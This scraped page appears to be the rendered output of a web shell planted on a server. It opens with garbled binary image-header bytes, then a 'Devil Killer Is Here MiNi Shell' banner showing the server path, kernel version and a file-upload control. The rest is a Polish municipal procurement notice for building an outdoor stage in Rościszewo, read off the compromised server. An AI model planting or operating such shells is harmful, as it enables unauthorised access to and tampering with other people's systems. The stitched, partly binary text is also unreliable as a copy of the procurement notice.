JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220916/0035145701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sceny plenerowej w miejscowości Rościszewo - postępowanie 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rościszewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej, 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rościszewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">242764076</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">242764201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rosciszewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rosciszewo.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sceny plenerowej w miejscowości Rościszewo - postępowanie 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-483d4078-3521-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00351457</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00014860/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Budowa sceny plenerowej w miejscowości Rościszewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Operację w ramach poddziałania 19.2 „Wsparcie na wdrażanie operacji w ramach strategii rozwoju lokalnego kierowanego przez społeczność” w ramach działania „Wsparcie dla rozwoju lokalnego w ramach inicjatywy LEADER” objętego PROW na lata 2014-2020, w zakresie rozwój ogólnodostępnej i niekomercyjnej infrastruktury turystycznej lub rekreacyjnej, lub kulturalnej – dofinansowanie do 63,63%. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami, w tym składanie ofert, wymianainformacji oraz przekazywanie dokumentów lub oświadczeń z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu<br/>środków komunikacji elektronicznej. Komunikacja miedzy zamawiającym a wykonawcami, z uwzględnieniem wyjątków określonych w ustawie odbywa się za pośrednictwem Platformy „JOSEPHINE”. pod adresem https://josephina.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest pod numerem referencyjnym sprawy: RRGKB.271.9.2022 Wykonawcy powinni we wszelkich kontaktach z zamawiającym powoływać się na wskazany numer referencyjny.<br/>2. Komunikacja miedzy zamawiającym a wykonawcami prowadzona jest w języku polskim.<br/>3. Zgodnie z art. 20 ust. 1 ustawy Pzp postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków przewidzianych w Pzp, prowadzi się pisemnie.<br/>4. Nie udziela się żadnych ustnych i telefonicznych informacji, wyjaśnień czy odpowiedzi na kierowane do Zamawiającego pytania.<br/>5. Wykonawca pobierający wersję elektroniczną SWZ z Platformy, zobowiązany jest do jej monitorowania w tym samym miejscu, z którego została pobrana, gdyż zamieszczane tam są wszelkie informacje dotyczące<br/>postępowania.<br/>6. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią udzielonych odpowiedzi jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.<br/>7. Wykonawca składając swoją ofertę, oświadcza, że zapoznał się z instrukcją użytkowania platformy.<br/>8. warunki korzystania z platformy JOSEPHINE oraz sposób dokonania rejestracji przez wykonawcę zawiera rozdział XVIII SWZ<br/>9. Wymagania techniczne<br/>9.1. Twój komputer musi być podłączony do Internetu. Dla sprawnego udziału w systemie Josephine przeznaczonego do elektronicznego składania ofert i elektronicznej komunikacji w zamówieniach publicznych należy zainstalować jedną z przeglądarek internetowych Mozilla Firefox 13.0 i wyższą (https://firefox.com), Google Chrome (https://google.com/chrome), Microsoft Edge (https://www.microsoft.com/edge) lub Internet Explorer wersję 11.0 i wyższą https://microsoft.com/).<br/>9.2. Konieczne jest włączenie obsługi javascript i plików cookie w przeglądarce. Instrukcję w jaki sposób włączyć obsługę plików cookie w przeglądarce internetowej można znaleźć pod adresem https://proebiz.com/pl/support. Możesz również wykonać test przeglądarki, który znajduje się w sekcji SUPPORT w stopce JOSEPHINE.<br/>9.3. W zamówieniach publicznych, w których wymagany jest podpis elektroniczny, Wykonawca musi posiadać ważny podpis elektroniczny oparty na kwalifikowanym certyfikacie spełniającym wymagania rozporządzenia (UE) nr 910/2014 Parlamentu Europejskiego i Rady Europy oraz odpowiednich przepisów państwowych. Podpisy elektroniczne oparte na kwalifikowanym certyfikacie są wystawiane przez kwalifikowanych dostawców usług w poszczególnych państwach członkowskich UE.<br/>9.4. Wykonawca ma w środowisku oprogramowania JOSEPHINE możliwość dodać do swoich wiadomości dokumenty elektroniczne (pliki). W przypadku komunikacji niezaszyfrowanej całkowita maksymalna objętość danych wynosi 500 MB, dla komunikacji szyfrowanej 300 MB. Maksymalna<br/>wielkość oznacza całkowitą objętość danych wykonawcy w ramach prowadzonej operacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Rościszewo, ul. Armii Krajowej 1, 09-204 Rościszewo, tel.: (24)2764011, e-mail: ugrosciszewo@interia.pl;<br/>2. Inspektorem ochrony danych osobowych w Gminie Rościszewo jest Pani Elżbieta Zielińska tel.: (24)276401 wew. 33, e-mail: iodo.rosciszewo@wp.pl.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1129 z późn. zm.), zwanej dalej Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami Pzp.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 Pzp.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>8.1. dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania;<br/>8.2. w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do organu</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Osobie, której dane dotyczą nie przysługuje:<br/>1.1. w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>1.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>1.3. na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRGKB.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 174305,20 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie zadania inwestycyjnego pn.: „Budowa sceny plenerowej w miejscowości Rościszewo”. <br/>2.	W istniejącym parku przy Urzędzie Gminy w Rościszewie, zaprojektowano stały obiekt małej architektury - scenę plenerową o wymiarach w rzucie poziomym płyty posadzkowej 8,0 x 8,8m w części zadaszonej o wymiarach 5,71m x 7,72m i wysokości 4,23 m. Poziom posadzki sceny plenerowej zaprojektowano na nasypie, 0,5 metra nad poziomem istniejącego terenu. Na poziom ten prowadzą cztery żelbetowe stopnie schodowe, wys. x szer. = 12,5 x 40cm (od strony frontowej obiektu) oraz podjazd dla niepełnosprawnych od strony zachodniej. Na frontowych stopniach schodowych zaprojektowano drewniane siedziska. Zadaszenie zaprojektowano jako obiekt o konstrukcji drewnianej, z dachem czterospadowym podpartym w czterech narożnikach. Każde podparcie złożone jest z czterech słupów drewnianych o przekroju 14x14 cm, połączonych ze sobą drewnianymi krzyżulcami o przekroju 7x10cm. Aby uzyskać efekt lekkości, zestawy słupów osłonięto drewnianymi elementami poziomymi w formie żaluzji. W centralnym punkcie każdego zestawu słupów umieszczono w posadzce halogen, podświetlający cały element podparcia dachu.<br/>3.	Zakres ilościowy robót:<br/>3.1.	Fundament sceny:<br/>3.1.1.	Formowanie i zagęszczenie nasypów o wys. do 3 m – duży nasyp pod scenę – 71,500 m3<br/>3.1.2.	Zagęszczenie nasypów ubijakami mechanicznymi – 71,928 m3<br/>3.1.3.	Wykopy oraz przekopy wykonane koparką - pod fundament sceny (fundament w osiach) – 53,826 m3<br/>3.1.4.	Podkłady betonowe w podłożu gruntowym B10 – 3,228 m3<br/>3.1.5.	Ławy betonowe prostokątne żelbetowe 0,6 x 0,3 m z betonu B30 – 7,263 m3<br/>3.1.6.	Przygotowanie i montaż konstrukcji pręty gładkie o śr. 6 mm (B500 SP) – 0,026 t<br/>3.1.7. Przygotowanie i montaż konstrukcji pręty gładkie o śr. 8 mm (B500 SP) – 1,299 t<br/>3.1.8.	Przygotowanie i montaż konstrukcji pręty gładkie o śr. 12 mm (B500 SP)– 0,172 t<br/>3.1.9.	Ściany żelbetowe proste grubości 25 cm - 30,223 m3<br/>3.1.10.	Izolacja przeciwwilgociowa powłokowa bitumiczna pionowa ścian fundamentowych – wykonane z lepiku asfaltowego na zimno - pierwsza warstwa – 90,384 m2<br/>3.1.11.	Izolacja przeciwwilgociowa powłokowa bitumiczna pionowa ścian fundamentowych – wykonane z lepiku asfaltowego na zimno - druga warstwa – 90,384 m2<br/>3.1.12.	Izolacja przeciwwilgociowa powłokowa bitumiczna pozioma – wykonana z lepiku asfaltowego na zimni - pierwsza warstwa – 14,526 m2<br/>3.1.13.	Izolacja przeciwwilgociowa powłokowa bitumiczna pozioma – wykonana z lepiku asfaltowego na zimni - druga i następna warstwa – 14,526 m2<br/>3.1.14.	Izolacja przeciwwilgociowa z papy na welonie szklanym – powierzchni poziomych na lepiku na zimno - pierwsza warstwa – 28,245 m2<br/>3.1.15.	Izolacja przeciwwilgociowa pozioma z foli PCW na sucho – jedna warstwa – 80,400 m2<br/>3.1.16.	Ręczne zasypanie wykopów ze skarpami – 23,160 m3<br/>3.2.	Podbudowa i posadzka sceny:<br/>3.2.17.	Podbudowa z kruszywa naturalnego (pospółka) - warstwa dolna 30 cm po zagęszczeniu – 84,250 m2<br/>3.2.18.	Podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm, 20 cm po zagęszczeniu – 84,250 m2<br/>3.2.19.	Podkłady betonowe na podłożu gruntowym B10 – 2,562 m3<br/>3.2.20.	Płyta posadzkowa żelbetowa z betonu C25/30 XF1 W6 gr 18 cm – 9,152 m3<br/>3.2.21.	Posadzka betonowa grubości 5 cm zatarta na gładko z betonu C25/30 XF1 W6 – 70,400 m2<br/>3.2.22.	Impregnacja posadzki żywicą epoksydową, 3 razy – 70,400 m2<br/>3.2.23.	Schody żelbetowe zewnętrzne na gotowym podłożu z betonu C25/30 XF1 W6 – 2,400 m3<br/>3.2.24.	Okładziny schodów z płytek kamionkowych GRES mrozoodporny, antypoślizgowy o wymiarach 20 x 30 cm na zaprawie klejowej mrozoodpornej, elastycznej – 12,60 m2<br/>3.3.	Konstrukcja drewniana:<br/>3.3.25.	Malowanie lakierobejcą konstrukcji drewnianej sceny w kolorze szary jesion – 233,029 m2<br/>3.3.26.	Osłonięcie deskami rynien dachowych z tarcicy nasyconej strugowej – 8,400 m2<br/>3.3.27.	Krokwie narożne i kalenicowe z drewna GL 28 (narożne 7 x 18 cm, kalenicowe 7 x 20 cm) – 0,352 m3<br/>3.3.28.	Krokwie zwykłe długości do 4,5 m z drewna GL28 (7 x 18 cm) – 0,542 m3<br/>3.3.29.	Słupy o długości ponad 2 m z drewna GL 28 (14 x 14 cm) – 1,061 m3<br/>3.3.30.	Belki ramy głównej długości ponad 3 m z drewna GL 28 (14 x 28 cm) – 1,045 m3<br/>3.3.31.	Belki ramy głównej długości ponad 3 m z drewna GL 28 (7 x 28 cm oraz 7 x 10 cm) – 0,154 m3<br/>3.3.32.	Krzyżulce i słupki z drewna GL 28 (krzyżulec 7 x 20 cm, słupek 7 x 10 cm) – 0,501 m3<br/>3.3.33.	Złącza ciesielskie stalowe - 112 sztuk<br/>3.3.34.	Wkręty konstrukcyjne ciesielskie – 140 sztuk<br/>3.3.35.	Deski połaciowe z tarcicy nasyconej struganej jednostronnie gr 2,5 cm – 44,20 m2<br/>3.3.36.	Pokrycie dachu papą podkładową na podłożu z drewnianym - jednowarstwowo - 44,20 m2<br/>3.3.37.	Pokrycie dachu dachówką bitumiczną w kolorze jasno szarym w kształcie prostokątów na osnowie z trwałego welonu szklanego pokrytego mieszanką bitumiczną – 44,20 m2<br/>3.3.38.	Rynny dachowe z PCW łączone na uszczelki - półokrągłe o śr. 100 mm w kolorze jasno popielatym – 28 m<br/>3.3.39.	Lej spustowy z PCW – 2 sztuki<br/>3.3.40.	Rury spustowe z PCW, okrągła śr. 75 mm w kolorze jasno popielatym – 7 m<br/>3.3.41.	Obróbki z blachy tytanowo – cynkowej gr 0,7 mm – 19,104 m2<br/>3.3.42.	Drewniana żaluzje – poziome i pionowe, elementy osłaniające słupy – 1,040 m3<br/>3.3.43.	Drewniana ściana osłonowa - słupy – 0,200 m3<br/>3.3.44.	Drewniana ściana osłonowa z desek pióro-wpust (deska szer. 23 cm i grubości 4,2 cm – 96,600 m<br/>3.3.45.	Montaż drewnianych siedzisk z łat 5x10 cm na schodach sceny za pomocą śrub, kotew do betonu i ceowników stalowych ocynkowanych i malowanych proszkowo w kolorze jasno popielatym RAL 7047 (6 ławek) – 3,600 m<br/>3.3.46.	Osłonięcie deskami rynien dachowych z tarcicy nasyconej struganej – 9,800 m2<br/>3.3.47.	Złącza ciesielskie do zamocowania rynien – 84 sztuki<br/>3.4.	Podjazd dla niepełnosprawnych, schody:<br/>3.4.48.	Ściany żelbetowe proste przy podejściach dla niepełnosprawnych – 20,760 m2<br/>3.4.49.	Przygotowanie i montaż zbrojenia konstrukcji monolitycznych, stal o śr. 12 mm (B500 SP) – 0,300 t<br/>3.4.50.	Nawierzchnia z kostki brukowej betonowej o grubości 6 cm na podsypce cementowo piaskowej – 12,300 m2<br/>3.4.51.	Balustrada ze stali KO dla osób niepełnosprawnych – 17,300 m<br/>3.5.	Elektryka:<br/>3.5.52.	Ręczne kopanie rowów do kabli na głębokość 0,8 m i szer. 0,4 m – 150 m<br/>3.5.53.	Nasypanie i podsypka z piasku gr. 0,1 m i szer. 0,4 m na dno rowu kablowego – 300 m<br/>3.5.54.	Ręczne zasypanie rowów dla kabli o głębokości 0,6 m i szer. 0,4 m – 120 m<br/>3.5.55.	Mechaniczne przepychanie rur SRS 90 mm przy zbliżeniu do drzew – 20 m<br/>3.5.56.	Układanie kabla zasilającego w rowach kablowych – 155 m<br/>3.5.57.	Tablica rozdzielcza kompletna z gniazdami – 1 sztuka<br/>3.5.58.	Rury ochronne z PCW o śr. do 22mm – oświetlenie altany – 40 m<br/>3.5.59.	Przewody kablowe o łącznym przekroju żył do 7,5 mm2 układane w listwach i kanałach elektroinstalacyjnych – oświetlenie altany – 40 m<br/>3.5.60.	Oprawy oświetleniowe zewnętrzne LED – wpuszczane na listwach, kierunkowe - 8 kpl.<br/>3.5.61.	Pomiary rezystancji izolacji instalacji elektryczne 3 fazowej, pierwszy pomiar - 2 pomiary<br/>3.5.62.	Pomiar rezystencji izolacji instalacji elektrycznej 1 fazowej, każdy następny pomiar – 2 pomiary<br/>3.5.63.	Sprawdzenia samoczynnego wyłączania zasilania, pierwsza próba – 1 próba<br/>3.5.64.	Sprawdzenia samoczynnego wyłączania zasilania, następna próba – 1 próba<br/>4.	Szczegółowy opis przedmiotu zamówienia zawiera:<br/>4.5.	Dokumentacja projektowa – załącznik nr 10 do SWZ <br/>4.6.	Przedmiary robót – załącznik nr 9 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45237000-7 - Roboty budowlane w zakresie scen</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert zawiera z podaniem wag tych kryteriów i sposób oceny zawarty jest w ROZDZIALE XXV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light 